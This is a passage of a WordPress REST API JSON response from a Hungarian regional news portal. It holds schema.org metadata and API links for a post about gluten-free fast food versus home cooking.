lpmdc.png","width":1200,"height":628},{"@type":"BreadcrumbList","@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/07\/13\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Kezd\u0151lap","item":"https:\/\/dorogimedence.hu\/"},{"@type":"ListItem","position":2,"name":"5 ok, ami\u00e9rt glut\u00e9nmentes gyors\u00e9telt v\u00e1lasztunk a f\u0151z\u0151csk\u00e9z\u00e9s helyett"}]},{"@type":"WebSite","@id":"https:\/\/dorogimedence.hu\/#website","url":"https:\/\/dorogimedence.hu\/","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","description":"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok","publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/dorogimedence.hu\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"hu"},{"@type":"Organization","@id":"https:\/\/dorogimedence.hu\/#organization","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","url":"https:\/\/dorogimedence.hu\/","logo":{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","width":600,"height":100,"caption":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l"},"image":{"@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/dorogimedence\/"]},{"@type":"Person","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4","name":"dorogimedence.hu","image":{"@type":"ImageObject","inLanguage":"hu","@id":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","url":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","contentUrl":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","caption":"dorogimedence.hu"}}]}},"_links":{"self":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/34816","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/comments?post=34816"}],"version-history":[{"count":0,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/34816\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media\/34817"}],"wp:attachment":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media?parent=34816"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/categories?post=34816"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/tags?post=34816"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}